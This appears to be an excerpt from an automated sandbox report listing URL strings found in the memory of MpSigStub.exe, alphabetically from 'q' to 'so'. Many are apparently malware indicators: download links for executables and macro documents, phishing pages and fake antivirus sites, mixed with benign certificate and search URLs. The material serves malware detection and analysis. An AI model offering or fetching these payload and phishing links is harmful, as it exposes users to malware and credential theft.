Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://quince78.cyan.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: http://qwst1t.3322.org:8087
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://qwuyegasd3edarq6yu.org/mSsQDIMIQ/ind7694GDs/
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp String found in binary or memory: http://r%d.clrsch.com/
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp String found in binary or memory: http://r%d.clrsch.com/ie/
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp String found in binary or memory: http://r%d.clrsch.com/x
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://r.funmoods.com//
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://r.zerotime.kr/
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://r3.o.lencr.org/
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://raa.qwepoii.org/v4/gtg/
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://raggina.space/bc855646d052/spool/boot/acxbbz.dot
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: http://random.99lnk.com/y8btd3lq
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://randominterest.com/
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://rapidshare.com/files/
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp String found in binary or memory: http://readlenta.ru/
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://rebrand.ly/ohxnqak
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp String found in binary or memory: http://recoverpcerror.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://redirect.sarahwilkesphotography.co.uk)
Source: MpSigStub.exe, 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp String found in binary or memory: http://redirsystem32.com
Source: MpSigStub.exe, 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp String found in binary or memory: http://redirsystem32.com/tds1/in.cgi?2&group=mp3
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://redlogisticsmaroc.com/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://redlogisticsmaroc.com/ti/doc/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://reefer.parts/js/lib/)
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://referfile.com
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://refud.me/scan.php
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp String found in binary or memory: http://registrywizard.com
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://relawananaksumsel.or.id/blosting/scan.html)
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://remitenow.one/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://remote-keylogger.net
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp String found in binary or memory: http://remove.gettango.com/
Source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp String found in binary or memory: http://renatopaschoal.com.br/dropbox/
Source: MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp String found in binary or memory: http://report.wallpaper.shqingzao.com
Source: MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp String found in binary or memory: http://report.wallpaper.shqingzao.com~
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp String found in binary or memory: http://reports.montiera.com/reports/jsRprt.srf?rid=nsis&nsisState=
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp String found in binary or memory: http://reports.montiera.com/reports/jsRprt.srf?rid=nsis&nsisState=xl
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://repository.swisssign.com/0
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://requestbin.net/r/163xiqa1
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://res-backup.com/bin/3.dotm
Source: MpSigStub.exe, 00000024.00000003.6328862944.00000197A3361000.00000004.00000001.sdmp String found in binary or memory: http://resource.aldtop.com
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: http://retinnoplay.com//ord/excelz/index.php
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: http://retirepedia.upsproutmedia.com/obskdhi.php
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://rewards.getjar.com
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: http://rezultsd.info/cd/cd.php?id=%s&ver=ig1
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://rgho.st/download/8ygs8ldbj/3887c2b13922a712c34f8f2407d142bb5b2ed630/3887c2b13922a712c34f8f240
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp String found in binary or memory: http://rghost.net/download/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://rhriss.com.br/site/tmp/swagin
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp String found in binary or memory: http://risweg.com/flpaoql.exe
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp String found in binary or memory: http://rl.ammyy.com
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://rmportal.bpweb.bp.comx
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://rmuxvayun.pkrgzrpdebksbl.gq:23513/eater.htm?little=15162&extent=kiss&switch=19450
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://rocesi.com/mncejd.exe
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://royalambassadorschools.com/wp-admin/includes/ftools/johnhood395.php
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://roybeth.com/ext/jquery.php
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp String found in binary or memory: http://rrppdigital.com.ve/wp-content/ai1wm-backups/chrome.jpg
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://rs-moto.ru/counter/?a=1
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://ruih.co.uk/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://ruih.co.uk/wapp/doc/
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: http://rustiquewellness.nl/7za.png
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://s-elisa.ru/data
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp String found in binary or memory: http://s.earching.info/
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp String found in binary or memory: http://s.earching.info/xA
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp String found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp String found in binary or memory: http://s.symcd.com0_
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://s.xcodelib.net/updates/ff/apps/111/pubid1001affid100100
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://s.xcodelib.net/updates/ff/apps/116/pubid1004affid100400
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://s.xcodelib.net/updates/ff/apps/119/pubid1008affid100800
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://s2.bestmanage.org/?name=%s
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp String found in binary or memory: http://s3-us-west-2.amazonaws.com/elasticbeanstalk-us-west-2-143692468872/Installer.exe
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://s3.amazonaws.com/adpk/getsavin/getsavin.ini/noproxygetoksettingslocation2http://s3.amazonaws.
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://s3.amazonaws.com/rewqqq/
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://sabadabe.xyz/_output2b172f0.exe
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: http://saemaeul.mireene.com/skin/board/basic/bin
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://safesaver.net/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://sahane34sohbet.000webhostapp.com/wp-content/themes/elbee-elgee
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://saintechelon.tk/11.doc
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://saintechelon.tk/ejl.doc
Source: MpSigStub.exe, 00000024.00000003.6347934302.00000197A4E28000.00000004.00000001.sdmp String found in binary or memory: http://sameshitasiteverwas.com/traf/tds/in.cgi
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: http://sandbaggersgolf.club/viewdoc/file.php?document=y2fzyxnqqgzlcnjlci5jb20=
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://santasalete.sp.gov.br/jss/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://saraylimucevherat.com/docfile/good/)
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: http://saveasapp.com/
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://saveimage.pw
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://savory15.pansy.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://sbrenind.com/niggab-x/niggab-x.exe
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp String found in binary or memory: http://sc-cash.com
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: http://scaladevelopments.scaladevco
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: http://scaladevelopments.scaladevco.com/17/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://scarecrowlawncare.com/wp-content/themes/sensible-wp/img/gr.mpwq
Source: UserOOBEBroker.exe, 00000017.00000002.7880664177.000001F548370000.00000002.00020000.sdmp String found in binary or memory: http://schemas.microso
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://schildersbedrijfdickrorije.nl/wp-content/upgrade/resume.php?id=
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://schoolaredu.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://scorpion-swan.com/bene/dhl/dhl.php)
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: http://scorpion-swan.com/lamba/loginpdf.html)/type/action/s/uri
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://screenhost.pw/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://screw-malwrhunterteam.com/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://scrollayer.com
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://scud.pipis.net/
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp String found in binary or memory: http://sds.clrsch.com/
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp String found in binary or memory: http://sds.clrsch.com/x
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp String found in binary or memory: http://sds.qckads.com/sidesearch/
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: http://seal.elitevs.net/Base
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: http://seal.nimoru.com/Base/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://search.17173.com/index.jsp?keyword=%s
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://search.btchina.net/search.php?query=%s
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/search?p=
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://search.crsky.com/search.asp?sType=ResName&keyword=%s
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://search.dangdang.com/dangdang.dll?mode=1020&catalog=100&key1=%s
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://search.games.sina.com.cn/cgi-bin/game_search/game_deal.cgi?keywords=%s
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://search.getwebcake.com/
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp String found in binary or memory: http://search.lycos.com/default.asp?src=clear
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://search.newhua.com/search.asp?Keyword=%s
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://search.psn.cn/
Source: MpSigStub.exe, 00000024.00000003.6326616398.00000197A3216000.00000004.00000001.sdmp String found in binary or memory: http://search.shopnav.com/
Source: MpSigStub.exe, 00000024.00000003.6326616398.00000197A3216000.00000004.00000001.sdmp String found in binary or memory: http://search.shopnav.com/_
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://search.union.yahoo.com.cn/click/search.htm?m=
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://searchglobalsite.com/in.cgi?
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: http://secure4709.spaldingscpa.com/con/next.php
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://security-updater.com/binaries/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://security.symantec.com
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: http://seedstar.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://seek.3721.com/srchasst.htm
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://seliconos.3utilities.com/
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://sense-super.com/cgi/execute_log.cgi?filename=debug&type=failed_registry_read
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://seocom.name/seogo/go.xmn?ix
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://sepa-europa.eu
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://serbetcimimarlik.com/tests/folder/excell.php
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://server00.send6.com/1abf8588/oluwa.exe
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://server2.39slxu3bw.ru/restore.xmlscrobj.dll
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://service.pandtelectric.com/
Source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp String found in binary or memory: http://service.softpost.com
Source: MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp String found in binary or memory: http://service.srvmd6.com/Mac/getInstallerSettings/?version=
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://serving.myshopcouponmac.com
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://sesame96.orange.ero0101.com/set_inf.php?id=ero257.wmv&cid=
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://sesame96.orange.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://session-dyfm.clientmsg13.review/8446c35a41f9e820533b6cd008b40749?fpcum=&amp;dyfm=ywx2yxjvx3zl
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://setup-mediaplayer.info/
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://setup.theoreon.com
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://setup1.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://setup2.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://setup3.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://setup4.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://seunelson.com.br/js/10.exe
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://seunelson.com.br/js/content.xml
Source: MpSigStub.exe, 00000024.00000003.6347934302.00000197A4E28000.00000004.00000001.sdmp String found in binary or memory: http://seuufhehfueughek.ws/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://sexfellatiomovesex.com/pc/page/set_reg.php?code=&cuid=
Source: MpSigStub.exe, 00000024.00000003.6328862944.00000197A3361000.00000004.00000001.sdmp String found in binary or memory: http://sf-addon.com/helper/setup/SaveFromNetHelper-Setup.exe
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://sf3q2wrq34.ddns.net
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://shintorg-k.ru/errors/wpactivt.php
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://shop.doublepoint.net//install/uplist2.php?pid=
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://shop.doublepoint.net/install/p_boot.php
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://shoppingjardin.com.py/v1/wp-themes/2.php
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://show.daohang.la:5000/go/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: http://sighttp.qq.com
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://silver13.net/java.exe
Source: MpSigStub.exe, 00000024.00000003.6279246359.00000197A4A35000.00000004.00000001.sdmp String found in binary or memory: http://simple%-files.com
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://simplesexinc.com/file/
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: http://simsoshop.com/update.php?c=
Source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp String found in binary or memory: http://sindarspen.org.br/
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://sitem.biz/
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://skidware-malwrhunterteams.com/scanme.txt
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://skillfulteaching.com/cataxs/img
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp String found in binary or memory: http://skorohod.city/invoice-corrections-for-
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: http://skyfalss.ir/hacnhhy/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://skype.tom.com/download/install/sobar.exe
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://slideshowlullabies.com/plugins/content/pagenavigation/item.php)
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://slpsrgpsrhojifdij.ru/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://slpsrgpsrhojifdij.ru/krablin.exe?
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: http://sluzby-specjalne.cba.pl/nr26.txt
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp String found in binary or memory: http://smart-antivirus-2009buy.com
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://smart.linkprice.com/sem/overture_sponsor_search.php?maxcnt=&js=2&type=
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://smart.linkprice.com/sem/overture_sponsor_search.php?maxcnt=&js=2&type=x
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://smg-blackhat.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://smpcollection.ir/poss/doc/purchase.doc
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: http://sndy2kungglobalinvestmentgooglednsaddres.duckdns.org/office/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://sneak.bananamikubanana.com/pc/page/set_reg.php?afrno=&cuid=
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://so.163.com/search.php?q=
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp String found in binary or memory: http://so1.5k5.net/interface?action=install&p=
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://soft.trustincash.com/url/config.xml
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp String found in binary or memory: http://softlog.twoshadow.cn/api/data/sync
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: http://sokyoss.drelshazly.com:8080/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://somnathskider.com/wp-content/themes/oceanwp/assets/css/edd/msg
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://sondervisual.com.ar/cnt.php?id=7314582
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://sonharvaleapena.com.br/en_us/copy_invoice/25680423862/dqzln-cwhrf_yagnf-spn
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://sonyxweb.ru
